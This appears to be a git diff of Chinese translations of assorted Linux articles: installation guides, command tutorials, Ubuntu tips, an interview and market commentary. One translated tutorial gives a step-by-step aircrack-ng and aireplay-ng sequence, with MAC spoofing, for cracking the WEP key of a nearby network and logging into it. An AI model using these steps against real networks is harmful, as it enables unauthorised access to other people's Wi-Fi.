12.许可证协议 就像所有CentOS的软件一样会有一个很小只有几行的许可证。所以同意吧!
13.**创建用户** 现在为自己创建一个使用系统的普通用户。
14.**当前日期和时间** 输入当前日期和时间并且选择使用网络自动同步时间。
### 开始使用 CentOS 6.5 ###
登陆之后,迎来的金光闪闪的CentOS 6.5 的桌面!
### 资源 ###
CentOS 6.5 release notes(版本记录)
via: http://www.binarytides.com/centos-6-5-installation-screenshots/
译者:[Vic___](http://blog.csdn.net/Vic___) 校对:[校对者ID](https://github.com/校对者ID)
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translated/Command Line Basics – watch.md
Normal file
translated/Command Line Basics – watch.md
Normal file
@ -0,0 +1,65 @@
Linux 基础命令 – watch
### Linux watch 命令 ###
Linux中的**watch** 命令提供了一种方式处理重复的任务。默认上**watch**会每2秒重复执行命令。就如你想的,watch是一个很好的观察log文件的工具。下面是一个例子。
watch tail /var/log/syslog
想要停止命令的执行,只要使用标准的kill流程, **[Ctrl]+C**。
![使用Linux watch命令监测syslog](http://tuxtweaks.com/wp-content/uploads/2013/12/Watch_01_wm.png)
*使用Linux watch命令监测syslog*
watch -n 10 tail /var/log/syslog
### 带有管道的watch命令 ###
watch -n 1 sensors
Adapter: Virtual device
temp1: +45.0°C (crit = +100.0°C)
sensors | grep temp | awk '{ print $2 }'
watch -n1 "sensors | grep temp | awk '{ print $2 }'"
### 将watch作为时钟 ###
就像你现在已经注意到的,**watch**执行后会在你的终端的右上角显示时间。我们可以通过传给watch一个空的命令参数来把它作为一个简单的时钟。 我们可以将一个空格包含在引号中来作为一个空的参数。
watch -n 1 " "
via: http://tuxtweaks.com/2013/12/linux-watch-command/
译者:[geekpi](https://github.com/geekpi) 校对:[校对者ID](https://github.com/校对者ID)
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@ -0,0 +1,45 @@
每日Ubuntu小技巧 - 使用Ubuntu拷贝CD和DVD光盘
就像Windows和Max OS X一样,Ubuntu是无所不能的!
- 创建数据CD/DVD时自动过滤隐藏和损坏的文件
- 同时支持多个绘画,可以执行磁盘文件的完整性
- 可以在忙碌中烧录视频CD/DVD[on the fly翻译不合适]
- 可以拷贝CD/DVD到系统硬盘
- 可以擦除CD/DVD
如果Ubuntu能够访问你的CD/DVD烧录机,Brasero会打开并自动识别光盘内容。在这里,你可以单击 **复制** 从源光盘创建一个拷贝。如果你希望创建多个拷贝,单击按钮 **创建多个拷贝**。
当系统提示安装所需的软件包时,单击 **安装**。
via: http://www.liberiangeek.net/2013/12/daily-ubuntu-tips-copy-cd-dvd-discs-using-ubuntu/
译者:[KayGuoWhu](https://github.com/KayGuoWhu) 校对:[校对者ID](https://github.com/校对者ID)
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@ -0,0 +1,54 @@
每日Ubuntu小技巧 - 在Ubuntu上面安装VMware Workstation
VMware Workstation是第二类商用虚拟化软件。被称为第二类是因为它是运行在现有的操作系统之上的,而正在运行的计算机成为宿主机。
你可以使用VMware Workstation在运行在宿主机上的一个操作系统上同时运行多个客户机。客户机可以是被支持的32位或者64位的操作系统。VMware Workstation支持Windows,Mac OS X,Solaris和许多其他系统。
这篇简短的教程将会教你怎么在Ubuntu上面安装VMware Workstation。
因为这个软件是商业软件,因此你必须要拥有一个可用的许可证才能够使用它。你可以从下载页面 [下载30天免费体验版][1]来体验它。如果你想注册,获得并且验证一个许可证即可。
想要在Ubuntu上开始安装VMware Workstation,首先需要运行如下命令升级Ubuntu。
sudo apt-get update && sudo apt-get dist-upgrade && sudo apt-get autoremove
sudo apt-get install build-essential linux-headers-`uname -r`
然后,下载VMware Workstation。接着进入Firefox保存文件的 **~/下载** 目录。
cd Downloads
unzip VMware-Workstation-Full*.zip
chmod +x VMware-Workstation-Full*.bundle
sudo ./VMware-Workstation-Full*.bundle
via: http://www.liberiangeek.net/2013/12/daily-ubuntu-tips-install-vmware-workstation-in-ubuntu/
译者:[SCUSJS](https://github.com/scusjs) 校对:[校对者ID](https://github.com/校对者ID)
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每日 Ubuntu 小技巧 - 更改 Ubuntu 使用语言
Ubuntu 是一个功能强大的现代化操作系统,并且它还允许你使用多种语言的桌面。在默认情况下,在你第一次安装 Ubuntu 的时候会预装几个语言包。但如果你想要你的 Ubuntu 能够支持更多语言的话,那你就必须安装额外的语言包。通常不是所有的语言都是支持的,但是大多数使用中的语言以及书面语言都能够被支持。下面是一个是简短教程,它将会展示如何去实现。
要想更改 Ubuntu 的使用语言,单击菜单栏右上角的 **gear**,并且选择 **System Settings**。在打开 System Settings 之后,选择 **Language Support**。
如果提示要你安装额外的语言支持,那就直接安装。如果没有,那么就单击 Install / Remove 去安装新的语言包,然后,选择你想安装的语言来安装。最后,拖动新的语言到列表的顶端并且保存。这些更改只会应用在你的个人帐号上。如果你想应用在全局范围内,单击 **Apply System-Wide** 。
拖动新的语言到列表的顶端。之后单击 Close。
同样,语言包的更改只是应用在你的个人帐号上。如果你想全局更改的话,你必须单击 Apply System-Wide。
via: http://www.liberiangeek.net/2013/10/daily-ubuntu-tipschange-the-language-you-use-in-ubuntu/
译者:[hyaocuk](https://github.com/hyaocuk) 校对:[Caroline](https://github.com/carolinewuyan)
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@ -1,23 +0,0 @@
**Ubuntu的设计师 Matthieu "Tiheum" James**,--Faenza和Faience的发明者--, 发布了一篇有趣的文章,(这篇文章)围绕着几个图标的发明展开。这篇有见地的文章使得感兴趣的用户和第三方开发人员能够直观地了解一个专业的设计师是怎样创作一个图标的。
via: http://iloveubuntu.net/deepen-your-creative-knowledge-explanatory-user-friendly-icon-creation-design-story
译者:[crowner](https://github.com/crowner) 校对:[校对者ID](https://github.com/校对者ID)
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@ -1,150 +0,0 @@
### 什么是hostname ###
从它的操作手册来看,hostname是用来显示系统的DNS名字以及为了显示和设置它的主机名或者NIS域名名字。所以hostname是依赖于DNS(Domain Name System域名系统)或者NIS(Network Information System网络信息系统)。
### 怎么显示hostname ###
$ hostname
上面的命令将会告诉你,计算机的名字是**ubuntu** 。
### 如何设置hostname ###
Hostname当你在第一次安装你的Linux的时候已经设置好了。 就是在你安装你的Linux产品的那步时,将会询问你去填入主机名信息。然而,**你可以稍后填写它**如果你愿意。
# hostname dev-machine
$ hostname
**On Debian / Ubuntu based Linux**
**基于Linux 的 Debian / Ubuntu**
# vi /etc/hostname
# vi /etc/hosts
|||| localhost
|||| dev-machine
**On RedHat / CentOS based Linux**
**基于Linux的 RedHat / CentOS**
|||| localhost.localdomain localhost dev-machine
### 怎么显示DNS域名 ###
$ dnsdomainname
在本篇文章,dnsdomainname命令的结果是 **bris.co.id**。
如果你看见结果是 (**none**),那么你的机器**没有配置完整合格的域名(FQDN(Fully Qualified Domain Name))**。Dnsdomainname命令摘取来自**/etc/hosts**文件的信息。你应该配置它为完整合格的域名格式。接下来一个简单的例子:
|||| localhost.localdomain localhost dev-machine
|||| dev-machine.bris.co.id dev-machine
$ dnsdomainname -v
Resolving ‘dev-machine.bris.co.id’ …
Result: h_name=’dev-machine.bris.co.id’
Result: h_aliases=’dev-machine’
Result: h_addr_list=’’
### 如何显示hostname更多细节信息###
$ hostname -i
$ hostname -d
$ hostname -s
* 这个命令将会产生与输入hostname同样的结果 *
$ hostname -f
所有的参数包括上述信息,都可以通过使用参数**-v 和 -d** 来概括。让我们来看一个例子。
$ hostname -v -d
Resolving ‘dev-machine.bris.co.id’ …
Result: h_name=’dev-machine.bris.co.id’
Result: h_aliases=’dev-machine’
Result: h_addr_list=’’
感到熟悉?是的,这个结果与**dnsdomainname -v**命令是相同的,同样包含上面的内容。
via: http://linoxide.com/linux-command/display-set-hostname-linux/
译者:[Vic___](http://blog.csdn.net/Vic___) 校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -0,0 +1,120 @@
[翻译中]by stduolc
### 你需要写什么 ###
- **一个可兼容的无线适配器**.这是最主要的需求。你需要一个无线适配器,能用来完成包注入,你的电脑很可能不具备这个功能。在和我的安全专家邻居讨论了以后,我从亚马逊上花了50美元购买了一个Alfa AWUS050NH适配器,图片如下。更新:别学我,应该买[Alfa AWUS036H][4]而不是US050NH。[视频][5]里的哥们儿用$12美金在Ebay上买了一个解调器(同时可以选择把[自己的路由器][6]卖掉).网上有很多可以[兼容aircrack的适配器][7].
- **[一个BackTrack Live CD][8]**. 我们已经提供了一个完整的[BackTrack 3的安装使用教程][9],Linux Live CD可以让你完成所有的安全测试和测试工作。请自行下载一个CD,然后刻录或者从VMware中启动它。
- **一个靠近的WEP加密的WIFI网络**. 信号需要足够的强,理想的情况下最好有用户正在使用、连接和断开设备。越多的人使用网络,你就可以的到更多的破解数据,这样你就更可能成功。
- **使用命令行的耐心**. 这里总共有10步,总共需要出入很长、很难懂的命令,然后等你的wifi网卡手机足够破解密码的数据。就像一个医生和一个急躁的病人说,有点耐心。
### 破解WEP ###
airmon-ng stop (interface)
ifconfig (interface) down
macchanger —mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
airodump-ng (interface)
airodump-ng -c (channel) -w (file name) —bssid (bssid) (interface)
Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to clipboard. You can use the Shift+Insert key combination to paste it into the command. Enter anything descriptive for (file name). I chose "yoyo," which is the network's name I'm cracking.
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
这里的ESSID是接入点SSID的名字,例如我的就是YoYo。你希望能在运行后得到“Association successful”的结果。
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
aircrack-ng -b (bssid) (file name-01.cap)
WEP密钥会接着显示“KEY FOUND”。去掉引号,然后输入他就可以登录到目标网络了。
### 这个过程中的问题 ###
via: http://lifehacker.com/5305094/how-to-crack-a-wi+fi-networks-wep-password-with-backtrack
译者:[stduolc](https://github.com/stduolc) 校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -1,95 +0,0 @@
- 用Kdenlive录制屏幕录像
- 用Audacity录制音轨
- 添加音轨到Kdenlive
- 上传到YouTube
- 全世界看你的视频,好开心
kdenlive支持最流行的数字视频格式,包括AVI,MP4,H.264,和MOV。它支持的图像文件,如GIF,PNG,SVG和TIFF;支持的音频文件格式,包括非压缩的PCM,Vorbis,WAV,MP3和 AC3。你甚至可以阅读和编辑Flash文件。总之,它可以处理很多东西。
Kdenlive的文档已过期,它会告诉你制作屏幕录像需要RecordMyDesktop软件。我用的是kdenlive 0.9.4,其实不需要Recordmydesktop。
*图 1:默认配置*
### 制作屏幕录像 ###
首次安装kdenlive,第一次运行时会启动配置向导。不必在意默认设置,因为你随时都可以改变它们。这是我的屏幕录像的设置:高清720p每秒30帧,1280x720的屏幕尺寸。如何知道使用什么设置项? [YouTube tells you][1]。设置这些值可到Settings > Configure Kdenlive > Project Defaults > Default Profile > HD 720p 30fps(图1),设置捕捉屏幕的大小到 Settings > Configure Kdenlive > Capture > Screen Grab(图2)。虽然你也可以选择捕捉全屏幕,但最好还是坚持用YouTube规定的尺寸。因为如果使用的尺寸与YouTube规定的不一样,则YouTube将增加Pillarboxes来达到合适的尺寸。热切的观众会更加希望看到一个充满生动的内容的屏幕,而不是Pillarboxes。
*Figure 2: Screencast screen size.*图 2:屏幕录像的屏幕大小
### 保存你的项目 ###
在你做任何其他事情之前,点击 File->Save as 保存您的项目,并记住周期性地保存它。
### 抓取屏幕 ###
抓屏小菜一碟。到Record Monitor,选择Screen Grab,然后点击Record按钮。屏幕上将打开一个带虚线的框,框里面的所有内容都将被录制下来。因此,你需要做的所有事就是移动框并调整框的大小到你想要l录制的范围。完成后点击停止按钮(图3)。
*图 3:屏幕抓取*
单击Stop,自动打开Clip Monitor,你可以预览你的裁剪效果。如果你喜欢它,把它从Project Tree中拖到Video 1轨道。现在你可以编辑你的视频了。总会有需要你修剪的地方;一个快速的方法是,你在Project Monitor里播放你的剪辑片,直到播放到你需要移除部分的末尾。然后暂停,然后按下Shift+r。你的剪辑片将会在你按下停止的时间轴上的点上被切割为两个剪辑。点击你要删除的片断,按下Delete键,噗!它就消失了。
对于剩下的剪辑片断,可能你想要从时间轴上的某一点开始播放,也可能你想要加入一些好的变换。比如一些简单的渐变就相当不错;右键点击你的剪辑片断,点击Add Effect > Fade > Fade from black 和 Fade to black,然后Kdenlive将自动将这两个效果放到开头和末尾。
### 添加配音 ###
请参阅[Whirlwind Intro to Audacity on Linux: From Recording to CD in One Lesson][2]来学习使用Audacity录音的基础。以16bit的wav格式导出你的音频文件,然后通过Project > Add Clip导入到Kdenlive。然后将你的新音频剪辑拖到Audio tracks。一个简单的制作视频陈述的方式是边播视频边说。运气好的话,你不需要做很多的清理工作,你的评述就会与视频同步。
*图 4:用Shift+r切割音轨,然后将其中一个剪辑片从切割点拖离,创建一个静音间隙*
### Rendering Your Project ### 渲染你的项目
当你满意自己的编辑,并准备导出你的最终格式时,点击Render按钮。这需要几分钟的时间,取决于你的电脑速度和项目大小。网页已有预先设定的值,如果你选择File Rendering, 你可以调整你的设置(图5)。我用File Rendering中的H.264,Video比特率12000, Audio比特率384取得了不错的效果。H.264是一种超压缩格式,使用这种格式发布的文件小但质量好。
*图 5:选择文件渲染,调整你的网页设置*
### YouTube Bound ###YouTube的装订
来源于: http://www.linux.com/learn/tutorials/745745-how-to-make-a-youtube-instructional-screencast-video-on-linux/
译者:[coolpigs](https://github.com/coolpigs) 校对:[校对者ID](https://github.com/校对者ID)
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translated/How to Repack Deb Files on Debian and Ubuntu.md
Normal file
translated/How to Repack Deb Files on Debian and Ubuntu.md
Normal file
@ -0,0 +1,41 @@
**以下教程将会教导Ubuntu、Linux Mint和Debian GUN/Linux用户,如何在它们基于Debian的Linux操作系统上轻松的解压和重新打包.deb文件。**
mkdir -p extract/DEBIAN
dpkg-deb -x package.deb extract/
dpkg-deb -e package.deb extract/DEBIAN [...do something, e.g. edit the control file...]
mkdir build
dpkg-deb -b extract/ build/
这五条命令将奇迹般地完成工作。让我为你解释一下:第一条命令创建了一个名为“extract”文件夹和一个名为“DEBIAN”的子文件夹;第二条命令会从你的.deb包提取程序文件到“extract”文件夹;第三条命令会解压.deb包的控制文件到“DEBIAN”子文件夹,在那里你就可以 修改/补丁 你想要的文件;第四条命令建立一个名为“build”的文件夹;而第五条命令会将修改后的文件重新构建到一个新的.deb包中,并在 “build” 文件夹中生成。
via: http://news.softpedia.com/news/How-to-Repack-Deb-Files-on-Debian-and-Ubuntu-404930.shtml
译者:[Luoxcat](https://github.com/Luoxcat) 校对:[Caroline](https://github.com/carolinewuyan)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -0,0 +1,51 @@
> 如果您尚未阅读[IT技能清单][1],我们强烈建议您在阅读以下内容前先熟悉这篇文章。它详细阐明了本次研究中用到的方法,本文也是基于[IT技能清单][1]的材料才得以进一步分析。
### 2013年8月IT技能分类更新 ###
### 嵌入式开发人员及程序员 ###
1. **Android, Embedded, C/C++/C# and Java**.如果您准备在嵌入式领域发展,这些是你需要掌握的核心技能,而C/C++/C#或Java掌握其一便可满足雇主需求,因为Java是基于部分C/C++/C#性能的扩展性语言。如果您阅读了8月的IT技能表,就会发现,Java以9513分居于编程语言的榜首,而C/C++/C#是5403分。如果您尚在犹豫是掌握C/C++/C#还是Java,从技能表得分看起来Java应该是更好的选择。但根据如下图表显示,C/C++/C#似乎在嵌入式领域的招聘需求中更受欢迎。总结可得尽管Java在IT技能表中有更高的得分,但在嵌入式开发职位上掌握C/C++/C#会比Java更有用。
1.** Python, Perl and Bash**.这些是对脚本编程语言技能的补充。对Perl和Python语言的需求经常会在招聘中同时出现,当然,也可以理解成这两种语言技能都是需要掌握的。
2. **Git, Subversion and Jira**.这些软件知识会应用到源码管理、调试和项目管理中,同时了解这几个方面的知识对相关项目的编程大有裨益。目前,主流开源项目和大量合作项目都在用类似的软件管理他们的源码。
### 涉及数据仓储及管理的虚拟化技术工程师 ###
目前第二大需求技能组是如下[依赖图][2]所示与虚拟化技术工程师相关的技能。这一组可进一步细分成两部分,第一部分是Redhat, VMware, vSphere, ESX/ESXi, XenServer and Citrix,这些技能对寻求虚拟化技术工程师的工作很重要;第二部分是同Unix系统、数据仓储及管理相关的技能。同时这两部分是紧密联系的。显然VMware和ESX/ESXi及vSphere是相关的,因为ESX/ESXi是VMware虚拟机下提供的虚拟产品,而vSphere是VMware虚拟机的云端虚拟操作系统。Redhat和VMware、Citrix产品被分到同一部分同样有其原因。这里Solaris和AIX具有密切关系的原因可以理解为它们都是专有的Unix系统,掌握其一便可。
### LAMP管理员 ###
### 总结 ###
### 参考 ###
[1] Percentage of Linux job ads linked with corresponding skill groups created by [GNU R][3]. Relevant package: graphics.
[2] Dependency charts created by [GNU R][3]. Relevant package: corrgram.
via: http://www.linuxcareer.com/insights-into-top-3-it-skills-groups-in-highest-demand
译者:[icybreaker](https://github.com/icybreaker) 校对:[校对者ID](https://github.com/校对者ID)
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@ -1,91 +0,0 @@
Linux 宗旨:‘开源很安全,Linux比其它任何系统都安全’
在对Linux基金会执行官,Jim Zemlin 的采访中,VentureBeat 展望了2014开源操作系统的未来。
We also addressed the controversial issues of government spying and “backdoors” — those nefarious windows into our personal online lives that the public recently discovered in most of the services we use every day.
Zemlin gave us the skinny on how and why GNU/Linux remains the most secure option for concerned consumers — and why it’s becoming the OS of choice for powering cars, phones, TVs, and all kinds of emerging devices.
Zemlin 为我们解释了 GNU/Linux 为什么以及如何使自身成为内心有些担忧的消费者的最安全的选择。还有就是为什么选择GNU/Linux作为车载操作系统,TVs以及其他新兴设备的操作系统。
**VentureBeat: 安全和隐私成为今年的热门话题,我们听到的谣言,Linus[Torvalds, Linux 创始人]对政府部门是否有安装后门的要求点头称是。**
**Zemlin**: Linux是否有后门,你是可以知道的.
And for the record: He wasn’t approached.
**VentureBeat: Linux基金会如何保证Linux用户的隐私和自由,使其免于遭受追踪和监视?**
**Zemlin**: 对此,我们一以贯之。向内核插入违反隐私权和背离自由精神的代码而不被成千上万的开发者注意到,这是很难的。Linux的本性就是自我定制。
**VentureBeat: 今年的隐私/安全/监视事件会不会促使, 或者将会促使更多的消费者倾向于Linux,对此你作何感想?**
**Zemlin**: 世界范围内,我听到人们都在说,“用开源保证隐私是必须的。”的确,那会促使更多的使用者选择Linux。
除了他们对linux平台下的隐私和安全持自信、信任的态度以外, 我认为消费者会基于多种原因选择Linux。
[视频游戏发行商] Valve [及其SteamOS下的工作][1] 正在促使更多的消费者走进Linux,就像逐渐占据主导的Android和其他运行Linux的电子设备一样,比如电视、家电、汽车等,当然还有更多。
**VentureBeat: 针对手机的Ubuntu Edge, 对它有何看法? 对于2014-2015年Linux/Ubuntu手机市场走势,你作何预测?*
我认为预测基于Linux的手机将占据主导地位,不算夸大事实。Android, Tizen, Ubuntu, Firefox,等等等等,都显示出Linux可以驱动手机市场的创新,并且为消费者创造新的体验,为开发者和OEMs创造机会。
**VentureBeat: What’s the most exciting use case you’ve seen so far for Linux embedded in automobile systems?**
**VentureBeat: 目前为止,你看到的linux嵌入式车载系统的最令人激动的使用案例是什么?**
**Zemlin**: 毫无疑问,就是,Cadillac, Tesla, Toyota, Jaguar, Land Rover等都搭建了车载信息娱乐系统。
比如,今年赢得了 “年度汽车族”奖项的Tesla Model S,装备了一个17英寸平面、运行着定制Linux的电脑。这真的是太酷了。
2014年度汽车族刚刚揭晓 -- Cadillac CTS sedan, 也是使用linux作为车载信息娱乐系统。汽车制造商有能力使用linux进行创新并区别使用这些系统。
**VentureBeat: 在硬核开发者市场以外,Linux是如何发展壮大的,尤其是考虑到消费者和游戏玩家?**
**Zemlin**:可以肯定的是,对游戏玩家来说,今年是linux的一个转折点。Valve, 基于Steam网络平台的一个游戏厂商,在linux上构建并运行所有的源代码和动画。Valve CEO Gabe Newell 称,今年的LinuxCon大会上他们在linux平台运行了198个游戏,随着引进基于linux的Stream,这个数字还会上升。这是Linux和游戏界新趋势的开端。
用户每天都在用linux。软件支撑着我们的日常生活。像Google,Facebook还有Twitter等公司,都建立在Linux和开源软件之上。去年10月份LinuxCon欧洲大会上,来自Twitter的Chris Aniszczyk告诉观众:
“Twitter 理所当然完全运行在linux上。为什么你们还需要其他的东西?”(言外之意就是有linux就够了,不需要别的什么东西了。)
如今Linux驱动着130万台日常用Android手机,每天近60万基于linux的新电视售出。新的家电以及汽车都建立在linux之上。主要交通系统也都在使用linux。最受欢迎的[GoPro 使用linux和开源软件][2]。举不完的例子。
敬请关注 - 你会看到更多的实例,无不展现出Linux和开源软件以及协同开发在日常生活中发挥越来越大的作用。
**VentureBeat: 在你看来,到2014年,免费和开源软件最大的机遇会是什么?**
**Zemlin**: 我们已经谈到游戏和电子设备,但是企业将会继续为linux呈现更多的机会。云计算的兴起为开发者带来新的机遇和挑战。你试着去找找没有运行在linux上的公共云。
via: http://venturebeat.com/2013/11/26/linux-chief-open-source-is-safer-and-linux-is-more-secure-than-any-other-os-exclusive/
译者:[译者ID](https://github.com/l3b2w1) 校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -0,0 +1,142 @@
Linux date命令 - 显示和设置系统日期与时间
操作系统上的时间或许只被认为是时钟。特别在控制台下, 我们通常不认为date重要。但是对于管理员,这个假设是错误的。你知道错误的日期和时间会使你不能编译程序么?
因为日期和时间的重要,这或许就是开发网络时间协议(Network Time Protocol)的原因。让我们开始了解date命令是如何工作的。
### 显示系统日期 ###
$ date
Thu Dec 5 22:55:41 WIB 2013
### 格式化日期 ###
日期有很多格式。如果你不喜欢默认的格式,你可以转换它。你可能会想"为什么我需要改变格式? 默认的输出对我足够了。" 是这样的。但是当你在编程时,默认输出或许无法满足用户的需求。因此这里有一些自定义输出。
### RFC 2822 的日期与时间输出格式 ###
$ date -R
Thu, 05 Dec 2013 23:40:53 +0700
**RFC 2822** 的格式像这样 : **星期, 日-月-年, 小时:分钟:秒 时区**
时区 +0700 等同于 GMT +7。
### 打印或者设置协调世界时 ###
在 [Wikipedia][1]上, UTC 意思是
> 主要的调节世界时钟和时间的标准。这是格林位置标准时间几个非常相近的继任者之一。
以UTC形式显示日期和时间, 使用 -u 参数
$ date -u
Thu Dec 5 16:45:58:UTC 2013
### 使用格式化选项 ###
要自定义你的日期格式, **使用加号 (+)**
$ date +”Day : %d Month : %m Year : %Y”
Day: 05 Month: 12 Year: 2013
$ date +%D
**%D** 格式遵循 **年/月/日 的格式**.
$ date +”%a %b %d %y”
Fri 06 Dec 2013
$ date +”%A %B %d %Y”
Friday December 06 2013
$ date +”%A %B %d %Y %T”
Friday December 06 2013 00:30:37
$ date +”%A %B-%d-%Y %c”
Friday December-06-2013 12:30:37 AM WIB
$ date –help
$ man date
### 设置系统日期和时间 ###
# date –set=”20140125 09:17:00”
这会**设置**你当前的系统日期和时间到**一月 25, 2014 and 09:17:00 AM。请注意**,你**必须**拥有特权来这么做。不然你会得到这样一个错误。
date: cannot set date: Operation not permitted
Sat Jan 25 09:17:00 WIB 2014
### 重置你的时间 ###
# hwclock
Fri 06 Dec 2013 03:44:10 AM WIB -0.314082 seconds
### 在脚本中使用date命令 ###
$ vi display.date
#! /bin/bash
DATETIME=$(date +”DATE: %a %b-%d-%Y TIME: %T WEEK NUMBER: %W”)
$ ./display.date
DATE : Fri Dec-06-2013 TIME: 03:08:19 WEEK Number :40
$ chmod 755 display.date
### 在备份流程中使用date ###
$ date +%F
$ tar zcfv /daily_backup/backup-`date +%F`.tar.gz /home/pungki/Documents
它会压缩文件夹**/home/pungki/Documents**到一个位于**/daily_backup folder**的文件**backup-2013-12-06.tar.gz**中。
### 总结 ###
date可能被认为在某些方面不重要。但是date扮演了一个重要的角色。通常上,要想知道关于date命令更多的细节,在你的控制台下输入man date访问man页面。
via: http://linoxide.com/linux-command/date-command-linux/
译者:[geekpi](https://github.com/geekpi) 校对:[校对者ID](https://github.com/校对者ID)
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translated/Linux shell tips and tricks.md
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translated/Linux shell tips and tricks.md
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Linux sheel 贴士和技巧
我日常使用Linux shell(Bash),但是我经常忘记一些有用的命令或者shell技巧。是的,我能记住一些命令但是我不能说只在特定的任务上使用一次。那么我就开始在我的Dropbox账号里用文本文件写下这些Linux shell的贴士,现在我决定共享它。这个表我以后还会更新。记住,这里的一些贴士需要在你的Linux发行版上安装额外的软件。
echo >/dev/tcp/ && echo "open"
Ctrl + z
openssl rand -hex n
source /home/user/file.name
ssh -vvv user@ip_address
带pem key的SSH
ssh user@ip_address -i key.pem
wget -r --no-parent --reject "index.html*" http://hostname/ -P /home/user/dirs
mkdir -p /home/user/{test,test1,test2}
ps axwef
jar -cvf name.war file
dd if=/dev/zero of=/tmp/output.img bs=8k count=256k conv=fdatasync; rm -rf /tmp/output.img
hdparm -Tt /dev/sda
echo -n "text" | md5sum
xmllint --noout file.xml
tar zxvf package.tar.gz -C new_dir
curl -I http://www.example.com
修改一些文件或目录的时间戳 (YYMMDDhhmm):
touch -t 0712250000 file
wget -m ftp://username:password@hostname
生成随机密码 (本例中16位字符长):
LANG=c < /dev/urandom tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo;
cp some_file_name{,.bkp}
smbclient -U "DOMAIN\user" //dc.domain.com/share/test/dir
在历史中运行命令 (这里在第100行):
unzip package_name.zip -d dir_name
多行文字 (按 CTRL + d 退出):
cat > test.txt
> test.txt
从Ubuntu NTP服务器上更新日期:
ntpdate ntp.ubuntu.com
netstat 显示所有tcp4监听的端口:
netstat -lnt4 | awk '{print $4}' | cut -f2 -d: | grep -o '[0-9]*'
qemu-img convert -f qcow2 -O raw precise-server-cloudimg-amd64-disk1.img \
重复运行命令,显示它的输出 (默认2s刷新):
watch ps -ef
getent passwd
mount -o remount,rw /
挂在目录 (适合于符号链接不成功的情况下):
mount --bind /source /destination
nsupdate < <EOF
update add $HOST 86400 A $IP
grep -r "some_text" /path/to/dir
lsof / | awk '{ if($7 > 1048576) print $7/1048576 "MB "$9 }' | sort -n -u | tail
free -m | grep cache | awk '/[0-9]/{ print $4" MB" }'
vim + some_file_name
git clone特定branch (master):
git clone git@github.com:name/app.git -b master
git切换到另外一个branch (develop):
git checkout develop
git branch -d myfeature
git push origin :branchName
Git push 新的branch到远程:
git push -u origin mynewfeature
find /home/user -maxdepth 1 -type d -empty
< test.txt sed -n '50,60p'
运行最后的命令 (如果是: mkdir /root/test, 下面会运行: sudo mkdir /root/test):
sudo !!
创建临时RAM文件系统 - ramdisk (首先创建在 /tmpram 目录):
mount -t tmpfs tmpfs /tmpram -o size=512m
grep -w "name" test.txt
echo "some text" | sudo tee -a /path/file
kill -l
生成随机密码 (本例中16个字符长):
openssl rand -base64 16
kill -9 $$
nmap -p 8081
设置git email:
git config --global user.email "me@example.com"
git pull --rebase origin master
find -iname "*txt*" -exec mv -v {} /home/user \;
paste test.txt test1.txt
pv data.log
echo "hosts.sampleHost 10 `date +%s`" | nc 3000
expand test.txt > test1.txt
< <space>>cmd
cd -
切割大的tar.gz文件 (每个 100MB) 并还原:
split –b 100m /path/to/large/archive /path/to/output/files
cat files* > archive
curl -sL -w "%{http_code}\\n" www.example.com -o /dev/null
当 Ctrl + c 没用时:
Ctrl + \
stat -c %U file.txt
lsblk -f
find . -type f -exec egrep -l " +$" "{}" \;
find . -type f -exec egrep -l $'\t' "{}" \;
printf '%100s\n' | tr ' ' =
**更新: 2013年11月25日**
via: http://www.techbar.me/linux-shell-tips/
译者:[geekpi](https://github.com/geekpi) 校对:[校对者ID](https://github.com/校对者ID)
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translated/Proprietary Unix Continues to Fall.md
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translated/Proprietary Unix Continues to Fall.md
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@ -0,0 +1,24 @@
专有 Unix 持续缩减
国际数据公司(IDC)的分析师在周三投寄了一篇[新闻稿][1]凸显出IBM 的 AIX 系统和 P-系列的硬件持有量已经快速下降。伴随着专有 Unix 系统下跌的同时,相关的运行着 Linux 系统的 X86 服务器销量却在崛起。IBM 已经明确指出这是一个长期趋势,所以投资了10亿美元用在基于 Power 系统的 Linux 开发。与新闻报道的 AIX 20%销售额下降的同时,我的这篇文章终于发布出来。
过去数年中,我在管理 AIX 和 Linux 系统上一点都不顺利,如果能让我挑选的话,会选择灵活性和易用性更好的 Linux 系统和稳定性更高的 Power 机器。根据我的经验, AIX 很难设置,在设置好要变动也很困难,但一旦设置好并启动起来,它就会一直很好的运行下去。一台配置合适的 AIX 服务器可以正常运行数年而无需干预,但是需要修改配置的时候,并且经常需要修改配置,就准备好长期的艰苦跋涉吧。相比之下,经过这么多年来,成千上万的开发人员和系统管理员,以及大牌公司的贡献,使得Linux更易于管理。根据[资讯天地][2]报道:
> Linux服务器市场正在健步崛起,服务器总销量占总收入的百分比高达28%,所以任何可以提高市场占有率的投资,将会非常有价值,即使大部分份额的Linux服务器仍然是商用 x86 硬件。
Intel 和 AMD 的硬件也现跨越式发展,正在缩小与 Power 机器的性能差距。当我听到一个新的刀片上配置 10GB 的以太网卡已经成为标准、256GB 的 RAM 已经很正常了以及普通业务需要订购装有 16 核 CPU 的服务器已经成为常态时,吃惊不小。Intel 服务器和 IBM 的 Power 服务器性能差不多,但价格低很多。因为企业的观注点在于是否逃脱“顾问软件”及 IBM 的供应商锁定,所以在行业标准的x86硬件上运行的开源软件正变得越来越有吸引力。然而,IBM已经降低了 Power 系列机器的价格来保持竞争力。
这说明, IBM 选择投入在基于 Power 机器的 Linux 系统而不是 AIX 系统。 IBM 可能已经开发出现代版的 AIX,并使用通用的开源工具以使交互操作性更好。尽管 IBM 声明 AIX 仍然是重要的,但在 Power 机器的销售额持续下降,伴随的是 Linux 方面的投入,这一切的一切都正在翻开新故事的新篇章。
